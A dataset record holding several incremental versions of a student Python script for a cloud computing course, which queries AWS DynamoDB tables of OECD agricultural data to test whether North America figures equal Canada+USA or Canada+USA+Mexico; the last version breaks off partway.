"step-1": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\n<mask token>\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-4": "<mask token>\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\nNORTH_AMERICA = 'northamerica'\nCANADA = 'canada'\nUSA = 'usa'\nMEXICO = 'mexico'\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\nOUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'\nENCODINGS_CSV = 'encodings.csv'\nUSAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python\n\n'''\n@author : Mitchell Van Braeckel\n@id : 1002297\n@date : 10/10/2020\n@version : python 3.8-32 / python 3.8.5\n@course : CIS*4010 Cloud Computing\n@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD\n\n@note :\n Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.\n Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),\n looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,\n as well as an overall conclusion for NA definition\n\n NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN\n\n NOTE: assume year range is 2010 to 2029 (inclusive)\n NOTE: assume perfect user input for commodity and variables\n - however, if input commodity that's not a valid commodity code or label, exits program with error message\n NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)\n'''\n\n'''\n IMPROVEMENT: Use 'encodings' table instead of the CSV file\n'''\n\n############################################# IMPORTS #############################################\n\n# IMPORTS - 'pip install <import-package>'\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\n\n############################################ CONSTANTS ############################################\n\n# TABLE CONSTANTS\nNORTH_AMERICA = \"northamerica\"\nCANADA = \"canada\"\nUSA = \"usa\"\nMEXICO = \"mexico\"\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\n\n# OTHER CONSTANTS\nOUTPUT_FORMAT = \"{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}\"\nENCODINGS_CSV = \"encodings.csv\"\n#ENCODINGS_TABLE_NAME = \"encodings\"\nUSAGE_STATEMENT = \"Usage: py queryOECD.py <commodity-code|commodity-label>\"\n\n############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################\n\n# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),\n# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n# then output the specific NA definition 'hit' results and probable conclusion for NA definition\ndef main():\n #globals\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # ========== ARGUMENTS ==========\n\n # Collect command line arguments when executing this python script\n argc = len(sys.argv)\n bad_usage_flag = False\n \n # Check #of args (deal with it later tho)\n # 1 optional arg for commodity, otherwise prompt user for it\n if argc > 2:\n bad_usage_flag = True\n print(\"Error: Too many arguments.\")\n \n # Exit with usage statement if flag has been triggered for any reason\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n\n # ========== AWS DYNAMO DB ==========\n\n # Init AWS DynamoDB client and resource (NOTE: these are global)\n dynamodb_client = boto3.client(\"dynamodb\")\n dynamodb_resource = boto3.resource(\"dynamodb\")\n\n # Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\")\n sys.exit(f\"[ERROR] {e}\")\n\n # Check the 4 tables exist, then get them all\n err_output = \"\"\n table_list = dynamodb_client.list_tables()['TableNames']\n\n print(f\"Existing Tables: {table_list}\")\n\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += f\"Error: Invalid table name '{t}' - table does not exist.\\n\"\n \n # Print all tables that did not exist, then exit\n if err_output != \"\":\n print(err_output.strip(\"\\n\"))\n sys.exit(\"ERROR: Terminating program because unable to get table that does not exist.\")\n\n # Get all tables (after checking they exist) (NOTE: these are global)\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n\n # Open the encodings CSV file and read its contents\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, \"r\", newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n\n # if field is var or commodity, set a key-value pair between code and label (in the respective map)\n for row in csv_content:\n if row[2] == \"variable\":\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == \"commodity\":\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n\n # Check args for commodity now, otherwise prompt user\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n # Ask user for commodity\n commodity_input = input(\"Commodity: \").strip()\n \n # Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)\n\n # Check if commodity found a code or None\n print(f\"ENCODING: {commodity_code}\")\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\"ERROR: Terminating program because input does not exist as an encoding commodity code or label.\")\n\n # Init total accumulators for each category\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n\n # iterate through each variable and analyze data (if applicable)\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif total_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither\")\n print(f\"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n\")\n\n############################################ 